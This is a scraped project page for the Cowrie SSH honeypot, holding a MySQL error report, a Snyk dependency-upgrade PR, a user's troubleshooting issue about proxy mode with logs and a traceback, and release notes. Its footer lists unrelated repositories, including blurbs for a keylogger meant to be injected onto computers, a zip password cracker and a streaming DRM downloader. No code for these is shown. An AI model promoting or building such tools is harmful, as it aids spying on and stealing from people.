    
    2022-12-06T07:29:34.709757Z [-] output_mysql: MySQL Error: (-1, 'No result set to fetch from.', None)
    
    opened by bentech4u 3
  • [Snyk] Security upgrade protobuf from 3.20.1 to 3.20.2

    [Snyk] Security upgrade protobuf from 3.20.1 to 3.20.2

    Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • requirements-output.txt
    ⚠️ Warning
    slackclient 2.9.4 requires aiohttp, which is not installed.
    service-identity 21.1.0 requires cryptography, which is not installed.
    pyOpenSSL 22.1.0 requires cryptography, which is not installed.
    mysql-connector-python 8.0.31 has requirement protobuf<=3.20.1,>=3.11.0, but you have protobuf 4.21.10.
    geoip2 4.6.0 requires aiohttp, which is not installed.
    
    

    Vulnerabilities that will be fixed

    By pinning:

    Severity | Issue | Upgrade | Breaking Change | Exploit Maturity :-------------------------:|:-------------------------|:-------------------------|:-------------------------|:------------------------- medium severity | Denial of Service (DoS)
    SNYK-PYTHON-PROTOBUF-3031740 | protobuf:
    3.20.1 -> 3.20.2
    | No | No Known Exploit

    Some vulnerabilities couldn't be fully fixed and so Snyk will still find them when the project is tested again. This may be because the vulnerability existed within more than one direct dependency, but not all of the affected dependencies could be upgraded.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by snyk-bot 1
  • Unable to connect to honeypot VM through proxy

    Unable to connect to honeypot VM through proxy

    Hello,

    I am trying to deploy cowrie in proxy mode with the following settings:

    backend = proxy
    
    # Guest details (for a generic x86-64 guest, like Ubuntu)
    guest_hypervisor = qemu
    
    backend = pool
    backend_ssh_host = localhost
    backend_ssh_port = 2022
    
    pool_max_vms = 4
    pool = local
    
    # Endpoint to listen on for incoming SSH connections.
    listen_endpoints = tcp:9090:interface=0.0.0.0
    

    Everything excluded is set to default value, except for the real backend credentials. Iptables are configured to redirect port 22 to port 9090.

    Successfully logging to the honeypot through Putty does not redirect me to VM, instead it shows the following error message:

    image

    This is how it looks in logs:

    2022-11-15T14:40:02.714110Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: x.x.x.x:x (10.0.0.4:9090) [session: 11699cf73924]
    2022-11-15T14:40:02.724076Z [FrontendSSHTransport,520,x.x.x.x] Remote SSH version: SSH-2.0-PuTTY_Release_0.76
    2022-11-15T14:40:02.733713Z [backend_pool.pool_server.PoolServerFactory] Received connection from 127.0.0.1:41042
    2022-11-15T14:40:02.734290Z [Uninitialized] Connected to backend pool
    2022-11-15T14:40:02.734577Z [PoolServer,521,127.0.0.1] Requesting a VM for attacker @ x.x.x.x
    2022-11-15T14:40:02.734771Z [PoolServer,521,127.0.0.1] Providing VM id 0
    2022-11-15T14:40:02.735102Z [PoolClient,client] Got backend data from pool: 192.168.150.217:22
    2022-11-15T14:40:02.735196Z [PoolClient,client] Snapshot file: /home/cowrie/cowrie/var/lib/cowrie/snapshots/snapshot-ubuntu18.04-75999260d50340aa9098062da1650500.qcow2
    2022-11-15T14:40:02.735334Z [cowrie.ssh_proxy.client_transport.BackendSSHFactory#info] Starting factory <cowrie.ssh_proxy.client_transport.BackendSSHFactory object at 0x7f8a9c87f370>
    2022-11-15T14:40:02.782461Z [FrontendSSHTransport,520,x.x.x.x] SSH client hassh fingerprint: 5b7713a9ef2d162b16ea018fa8d40f02
    2022-11-15T14:40:02.783927Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ssh-ed25519'
    2022-11-15T14:40:02.784027Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] outgoing: b'aes256-ctr' b'hmac-sha1' b'none'
    2022-11-15T14:40:02.784101Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] incoming: b'aes256-ctr' b'hmac-sha1' b'none'
    2022-11-15T14:40:02.850464Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] NEW KEYS
    2022-11-15T14:40:02.850962Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] starting service b'ssh-userauth'
    2022-11-15T14:40:04.530477Z [Uninitialized] Connected to SSH backend at b'192.168.150.217'
    2022-11-15T14:40:04.530869Z [Uninitialized] Connected to honeypot backend
    2022-11-15T14:40:05.694227Z [cowrie.ssh_proxy.userauth.ProxySSHAuthServer#debug] b'student' trying auth b'none'
    2022-11-15T14:40:10.343627Z [FrontendSSHTransport,520,x.x.x.x] Connection to backend not ready, buffering packet from frontend
    2022-11-15T14:40:10.344638Z [cowrie.ssh_proxy.userauth.ProxySSHAuthServer#debug] b'student' trying auth b'password'
    2022-11-15T14:40:10.345534Z [FrontendSSHTransport,520,x.x.x.x] login attempt [b'student'/b'student'] succeeded
    2022-11-15T14:40:10.362593Z [FrontendSSHTransport,520,x.x.x.x] Initialized emulated server as architecture: linux-x64-lsb
    2022-11-15T14:40:10.419995Z [FrontendSSHTransport,520,x.x.x.x] Connection to backend not ready, buffering packet from frontend
    # this might be the point, where the error shows up
    2022-11-15T14:40:33.175725Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ecdsa-sha2-nistp256'
    2022-11-15T14:40:33.176223Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] outgoing: b'aes256-ctr' b'hmac-sha2-512' b'none'
    2022-11-15T14:40:33.176309Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] incoming: b'aes256-ctr' b'hmac-sha2-512' b'none'
    2022-11-15T14:40:41.233811Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] NEW KEYS
    2022-11-15T14:40:41.234285Z [BackendSSHTransport,client] Backend Connection Secured
    2022-11-15T14:40:41.251355Z [BackendSSHTransport,client] Will auth with backend: x/x
    2022-11-15T14:40:41.251870Z [BackendSSHTransport,client] got channel b'session' request
    2022-11-15T14:40:54.764575Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#info] connection lost
    2022-11-15T14:40:54.765091Z [FrontendSSHTransport,520,x.x.x.x] Connection lost after 50 seconds
    2022-11-15T14:40:54.774787Z [BackendSSHTransport,client] Lost connection with the pool backend: id 0
    2022-11-15T14:40:54.775126Z [cowrie.ssh_proxy.client_transport.BackendSSHFactory#info] Stopping factory <cowrie.ssh_proxy.client_transport.BackendSSHFactory object at 0x7f8a9c87f370>
    2022-11-15T14:40:54.775420Z [PoolServer,521,127.0.0.1] Freeing VM 0
    

    Sometimes there's different logged events after successful login attempt:

    2022-11-15T01:00:45.902697Z [BackendSSHTransport,client] [SSH] Detected Public Key Auth - Disabling!
    2022-11-15T01:00:53.399529Z [FrontendSSHTransport,57,x.x.x.x] Unhandled Error
            Traceback (most recent call last):
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py", line 96, in callWithLogger
                return callWithContext({"system": lp}, func, *args, **kw)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py", line 80, in callWithContext
                return context.call({ILogContext: newCtx}, func, *args, **kw)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/context.py", line 117, in callWithContext
                return self.currentContext().callWithContext(ctx, func, *args, **kw)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/context.py", line 82, in callWithContext
                return func(*args, **kw)
            --- <exception caught here> ---
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 487, in _doReadOrWrite
                why = selectable.doRead()
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/tcp.py", line 248, in doRead
                return self._dataReceived(data)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived
                rval = self.protocol.dataReceived(data)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/server_transport.py", line 244, in dataReceived
                self.dispatchMessage(message_num, packet[1:])
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/server_transport.py", line 261, in dispatchMessage
                self.packet_buffer(message_num, payload)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/server_transport.py", line 434, in packet_buffer
                self.sshParse.parse_num_packet("[SERVER]", message_num, payload)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/protocols/ssh.py", line 330, in parse_num_packet
                channel = self.get_channel(self.extract_int(4), parent)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/protocols/ssh.py", line 406, in get_channel
                if channel[search] == channel_num:
            builtins.KeyError: 'clientID'
    
    2022-11-15T01:00:53.401422Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#info] connection lost
    

    I tried using terminal to log in instead, this however produces different, but still unsuccessful results:

    Error message:

    dispatch_protocol_error: type 7 seq 7
    Connection to x closed by remote host.
    Connection to x closed.
    

    Logged events are the same.

    Expected behavior After successful authentication cowrie connects attacker with the VM.

    Server (please complete the following information):

    • OS: Linux cowrie 5.15.0-1022-azure 27~20.04.1-Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux
    • Python: Python 3.8.10
    opened by katsonka 0
Releases(v2.4.0)
  • v2.4.0(Jul 16, 2022)

    Release 2.4.0


    • Deprecate Python 3.7
    • Early support for Python 3.11
    • ThreatJammer output plugin (@diegoparrilla)
    • Telegram output plugin (@Louren)
    • Discord output plugin (@CyberSparkNL)
    • Updated mongodb output plugin
    • Dependency upgrades
    • Docker repo merged with this one
    • wget and curl rewritten using treq.
    • Migrate test framework from trial to unittest (@lazycrazyowl)
    Source code(tar.gz)
    Source code(zip)
  • v2.3.0(Oct 17, 2021)

    Release 2.3.0 Deprecate Python 3.6 Support Python 3.10 Dependency updates MISP Output plugin extension add new public keys ECDSAKeys and ed25519 (#1627) fix userdb.example (#1619) cache url submission to virustotal MySQL connector (#1575) - needs new external dependency mysql-connector-python Fix mysql string expansion (#1565) Rewrite CSIRTG output plugin to use new library version Fixed the Slack output to work with the versions 2.x of slackclient fix MySQL error handling fix tar command limit connections to private address ranges Update GreyNoise Output Script to Use Community API (#1524) Implement getopt-style parsing for uname (#1516) Allow SSLv3 connections for wget and curl Support for 301 redirects in wget Malshare update API (#1472) Remove hpfeeds.py infavour of hpfeeds3.py

    Source code(tar.gz)
    Source code(zip)
  • v2.2.0(Nov 11, 2020)

    Release 2.2.0

    • Deprecate Python 2.7 and 3.5
    • Command substitution with backticks (PeterSufliarsky)
    • Better chmod command line parsing (PeterSufliarsky)
    • Add uniq command (PeterSufliarsky)
    • Enhanced command substitution functionality.
    • Fix nc hang
    • Rename built-in user richard to phil, it's used as detection mechanism.
    • Binary suppport for cat, grep and other commands
    • Azure Sentinel output plugin
    Source code(tar.gz)
    Source code(zip)
  • v2.1.0(May 10, 2020)

    • Deprecate Python 2.7. Still works but removed from testing suite and fixing 2.7 problems will no longer have priority.
    • Disable crashreporter
    • Updated ELK documentation and output plugin
    • tee command added. Updates to cat, dd and wc.
    • Fixed SSH compression issue with AsyncSSH client
    • AbuseIP output plugin.
    Source code(tar.gz)
    Source code(zip)
  • v2.0.2(Nov 5, 2019)

  • v2.0.1(Nov 2, 2019)

  • v1.9.7(Oct 4, 2019)

  • v2.0.0(Oct 15, 2019)

    • Based on @sgtpepperpt's excellent work for GSoC we are now releasing Cowrie 2.0.0 with Proxy Support! Cowrie can now run in Proxy Mode and run a set of real live systems in the back-end using Qemu for more accurate backend simulation.
    Source code(tar.gz)
    Source code(zip)
  • 1.6.0(Apr 4, 2019)

    Release 1.6.0

    • 2019-03-31 New documentation theme
    • 2019-03-23 Greynoise output plugin (@mzfr)
    • 2019-03-19 direct-tcp forwarding now written to databases (@gborges)
    • 2019-03-19 Reverse DNS output plugin (@mzfr)
    • 2019-03-17 Shell emulation pipe upgrade (@nunonovais)
    • 2019-03-14 Shell emulation environment variables improved (@nunonovais)
    • 2019-03-14 SSH crypto parameters now configurable in config file (@msharma)
    • 2019-03-13 Disable keyboard-interactive authentication by default with option to enable
    • 2019-03-13 Added wc, crontab, chpasswd command (@nunonovais)
    • 2019-
    • 2019-03-07 Output of ssh -V now configurable in cowrie.cfg with ssh_version setting
    • 2019-03-07 Multiple timezone support in cowrie.cfg timezone directive. Default timezone is now UTC for both cowrie.log and cowrie.json
    • 2019-03-12 Handle multiple password prompt. Option to enable or disable keyboard interactive prompt.
    Source code(tar.gz)
    Source code(zip)
  • 1.5.3(Feb 12, 2019)

    Release 1.5.3

    • 2019-01-27 Telnet NAWS negotation removed to stop NMAP cowrie detection
    • 2019-01-27 Various fixes for Python2/3 compatibility
    • 2019-01-09 Documentation converted to ReStructuredText
    • 2018-12-04 Fixes for VT outut plugin to only submit new files
    Source code(tar.gz)
    Source code(zip)
  • 1.5.2(Nov 20, 2018)

    Release 1.5.2

    • 2018-11-19 Fix tftp exception and tftp test
    • 2018-11-14 Remove dblog mechanism and splunk legacy output plugin.
    • 2018-11-01 Add Python3 support for Splunk output plugin
    • 2018-10-23 Improved free command
    • 2018-10-20 Improved uname command
    • 2018-10-16 Save VT results to JSON log
    Source code(tar.gz)
    Source code(zip)
  • 1.4.1(Aug 6, 2018)

  • v1.0.0-alpha(Aug 7, 2015)

Owner
Cowrie
Cowrie Project
Cowrie
"KeyLogger-WebService" Is a Keylogger Write In python.

KeyLogger-WebService "KeyLogger-WebService" Is a Keylogger Write In python. When you Inject the file on a computer once the file is opened on the comp

Freddox 21 Dec 16, 2022
A proxy for asyncio.AbstractEventLoop for testing purposes

aioloop-proxy A proxy for asyncio.AbstractEventLoop for testing purposes. When tests writing for asyncio based code, there are controversial requireme

aio-libs 12 Dec 12, 2022
Code to do NF in HDR,HEVC,HPL,MPL

Netflix-DL 6.0 |HDR-HEVC-MPL-HPL NOT Working| ! Buy working netflix cdm from [em

4 Dec 28, 2021
zip-brute Zip File Password Cracking with Using Password List

Zip brute is a python script that cracks zip that are password protected using a wordlist dictionary.

AnonyminHack5 13 Nov 03, 2022
Anti Supercookie - Confusing the ISP & Escaping the Supercookie

Confusing the ISP & Escaping the Supercookie

Baris Dincer 2 Nov 22, 2022
Python lib to automate basic QFT calculations like Wick-contractions.

QFTools Python lib to automate basic QFT calculations like Wick-contractions. Features Wick contractions for real scalar fields Wick contractions for

2 Aug 21, 2022
Apache OFBiz rmi反序列化EXP(CVE-2021-26295)

Apache OFBiz rmi反序列化EXP(CVE-2021-26295) 目前仅支持nc弹shell 将ysoserial.jar放置在同目录下,py3运行,根据提示输入漏洞url,你的vps地址和端口 第二次使用建议删除exp.ot 本工具仅用于安全测试,禁止未授权非法攻击站点,否则后果自负

15 Nov 09, 2022
This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

This repository detects a system vulnerable to CVE-2022-21907 and protects against this vulnerability if desired

26 Dec 26, 2022
Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source

Infoga - Email OSINT Infoga is a tool gathering email accounts informations (ip,hostname,country,...) from different public source (search engines, pg

m4ll0k (mallok) 1.8k Jan 04, 2023
This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit relays only.

This is a partial and quick and dirty proof of concept implementation of the following specifications to configure a tor client to use trusted exit re

22 Nov 09, 2022
CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection

CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection Usage usage: cve-2021-26084_confluence_rce.py [-h] --url URL [--cmd CMD] [--shell] CVE-2021-2

r0cky 92 Jul 20, 2022
Python bindings to LibreSSL library

LibreSSL bindings for Python using CFFI Python3 bindings to LibreSSL using CFFI. It aims to provide interface to the most important bits of LibreSSL o

Alexander Kiselyov 1 Aug 02, 2022
PasswordManager is a command-line program that helps you manage your secret files like passwords

PasswordManager is a command-line program that helps you manage your secret files like passwords. It's very minimalistic and easy to use.

Michael 3 Dec 30, 2021
This repo is about steps to create a effective custom wordlist in a few clicks/

Custom Wordlist This repo is about steps to take in order to create a effective custom wordlist in a few clicks. this comes handing in pentesting enga

2 Oct 08, 2022
Log4j command generator: Generate commands for CVE-2021-44228

Log4j command generator Generate commands for CVE-2021-44228. Description The vulnerability exists due to the Log4j processor's handling of log messag

1 Jan 03, 2022
Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)

log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk

Fox-IT 431 Dec 22, 2022
Chromepass - Hacking Chrome Saved Passwords

Chromepass - Hacking Chrome Saved Passwords and Cookies View Demo · Report Bug · Request Feature Table of Contents About the Project AV Detection Gett

darkArp 622 Jan 04, 2023
2021hvv漏洞汇总

清单 披露时间 涉及商家/产品 漏洞描述 2021/04/08 启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(历史漏洞) CNVD-2021-17391 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793 2021/04/08 禅道项目管理软件11.6 禅道 11.6 sq

555 Jan 02, 2023
HTTP security headers for Flask

Talisman: HTTP security headers for Flask Talisman is a small Flask extension that handles setting HTTP headers that can help protect against a few co

Google Cloud Platform 854 Dec 30, 2022
CVE 2020-14871 Solaris exploit

CVE 2020-14871 Solaris exploit This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems. The act

Robin Massink 2 Oct 25, 2022